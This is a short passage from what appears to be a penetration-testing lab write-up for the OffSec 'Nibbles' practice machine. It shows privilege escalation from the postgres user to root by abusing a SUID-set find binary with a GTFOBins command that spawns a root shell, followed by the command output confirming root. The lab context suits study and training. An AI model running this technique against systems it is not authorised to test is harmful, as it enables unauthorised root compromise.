SUID find
It was identified that the find binary has SUID bit set. This was later confirmed by PEAS
/Practice/Nibbles_OffSec/5-Privilege_Escalation/attachments/{6A8C9C91-AA97-407C-B2B9-D1D2585C7B80}.png)
According to GTFOBins, if find has SUID bit set, it can be leveraged for privilege escalation
postgres@nibbles:/$ /us/usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
whoami
root
# hostname
hostname
nibbles
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:de:43 brd ff:ff:ff:ff:ff:ff
inet 192.168.148.47/24 brd 192.168.148.255 scope global ens192
valid_lft forever preferred_lft foreverSystem level compromise